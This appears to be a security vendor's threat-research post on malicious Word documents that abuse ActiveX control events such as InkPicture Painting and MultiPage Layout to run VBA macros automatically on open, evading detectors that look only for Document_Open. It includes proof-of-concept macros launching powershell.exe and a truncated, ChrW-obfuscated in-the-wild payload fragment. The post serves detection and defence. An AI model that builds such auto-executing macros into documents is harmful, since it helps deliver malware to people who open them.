In late August we began to detect malicious Microsoft Word documents that contained VisualBasic (VB) macro code and the code appeared to be triggering when the document was opened. However, the documents did not contain any of the standard events used to launch VB macro code when a document is opened, including Document_Open, or Auto_Openevents. Upon closer examination, all the documents contained the ActiveX InkPicture control and thePaintedevent. The InkPicturePaintedevent is triggered upon document open, just like theDocument_Openevent. Using ActiveX controls like InkPicture and events associated with it, an attacker can create malicious documents that launch VB macro code when the document is opened without using the standard document open event triggers. Security solutions that examine documents and only look for the standard document open events are likely to miss documents that use ActiveX controls like InkPicture to launch code when the document first opened.

Other vendors made note of the use of InkPicture ActiveX controls to launch VB macro code when the document is opened [1] [2].

It was also immediately obvious that InkPicture events other thanPainted, likePaintingorMouseHover, could be used to launch VB macro code at document open. In addition, Microsoft Office ActiveX controls other than InkPicture could also be used to launch VB macro code at document open.

We created a number of proof-of-concept documents using other events associated with InkPicture to observe how these samples behaved in the Threat Grid sandbox.

For example, this proof-of-concept sample launches powershell.exe using the InkPicturePaintingevent when the document opens.

Dim Once As BooleanPrivate Sub InkPicture1_painting(ByVal hDC As Long, ByVal Rect As InkRectangle, Allow As Boolean)

If Once Then Exit SubOnce = TrueShell ("powershell.exe")

End Sub

Figure 1: shows powershell.exe being launched using the InkPicture Painting event when document opens

This proof-of-concept sample launches powershell.exe using the InkPictureMouseHoverevent when the document opens, this event triggers when the mouse is on top of the InkPicture control, and triggers automatically if the the mouse starts over the document when it opens, or the user moves the mouse on top of the document while it is open.

Dim Once As BooleanPrivate Sub InkPicture1_MouseHover()

If Once Then Exit SubOnce = TrueShell ("powershell.exe")

End Sub

Figure 2: powershell.exe is launched using the InkPicture MouseHover event when the document opens

We added detection for these proof-of-concept samples as well as the means to detect new variants using other ActiveX controls.

Other researchers noted that InkPicture events in addition toPainted, and ActiveX controls other than InkPicture could be used to launch VB macros when a document was opened [3].

We have now begun to detect in-the-wild samples using InkPicture events other thanPainted. We have also begun to detect in-the-wild samples using ActiveX controls other than InkPicture to launch VB macro code when a document is opened.

For example, we detected a very small number of documents using theMouseEnterevent that is triggered at document open if the mouse is over the document.

Private Sub InkPicture1_MouseEnter()   Dim first As String   Dim second As String   Dim third As String   Dim fourth As String   Dim fifth As String   Dim sixth As String   Dim seventh As String   Dim eighth As String   Dim ninth As String   Dim tenth As String   Dim eleventh As String   Dim twelfth As String   Dim last As Stringfirst = ChrW(99) & ChrW(109) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(99)second = ChrW(32) & ChrW(80) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(83) & ChrW(104) & ChrW(101) & ChrW(108)third = ChrW(108) & ChrW(32) & ChrW(40) & ChrW(78) & ChrW(101) & ChrW(119) &

Over the weekend of October 15 and 16 we detected a large number of documents using the ActiveX control MultiPage to automatically launch VB macro code at document open. These documents contain the ActiveX MultiPage control and use the associatedLayoutevent. The Microsoft documentation indicates theLayoutevent triggers when, "... a form, Frame, or Multipage changes size." [4]

The malicious documents, and proof-of-concept documents we created, demonstrate the MultiPage control'sLayoutevent will trigger automatically when a document opens.

This is an example of a theLayoutevent from a malicious sample:

Public Sub Adbvy_Layout(ByVal hdpmymr As Long)   If MdsMR Then Exit Sub   MdsMR = True   gHLPhAD   End Sub   Public Sub gHLPhAD()   On Error GoTo vdvunp   PAaPbaC   tcqmPm BXGkJ   Exit Sub   vdvunp:   End Sub

The ActiveX controls InkPicture and MultiPage are just 2 of many ActiveX controls supported by Microsoft Office. Many of these ActiveX controls have associated events that can be triggered if a document is simply opened and macros are enabled.

Microsoft Office does not enable untrusted macros by default, but based on the fact users can manually enable macros and the sheer volume of malicious documents with embedded VB macros we see, attackers are finding success using these kinds of documents. We expect to see attackers further expand the use of ActiveX controls and further evolve techniques to avoid detection.

Example malicious document SHAs:

21f6d96f923e03ab4bd9b4b03005749be5617b4ed12dd1894b63672b8ee05ba24dd97f3e6ab0b8220c944845bb6daac243ddcf800b4bab315c20ea9869dd976e51ec277f9eba95e9b81885b17d914ed0ef31ceb93f95ea5cb7e6bcc6d5fc3efe9b28b2266ccfb409153eeacefb76f3a17de486a51d19c56deeac92fbd2db947bb7d0bf849efe2ecaa6a614c4a02c22d73ce73a2d3747076afe5833385ba92860c35495bc7483a8a71a89dd8859ee16ad1c73e251b1995165a4963522dddf0e42

Be sure to tune in to our webinar next week, The Ransomware Threat: New Tactics and How to Fight Back, where experts Eric Hulse and Josh Reynolds of Cisco Research and Efficacy Team (RET) will discuss the ransomware threat and how to fight back. Register to attend here.

References

[1] https://joe4security.blogspot.com/2016/09/will-it-blend-this-is-question-new.html

[2] https://www.proofpoint.com/us/threat-insight/post/ursnif-banking-trojan-campaign-sandbox-evasion-techniques

[3] https://www.greyhathacker.net/?m=201609

[4] https://msdn.microsoft.com/en-us/library/office/gg264490.aspx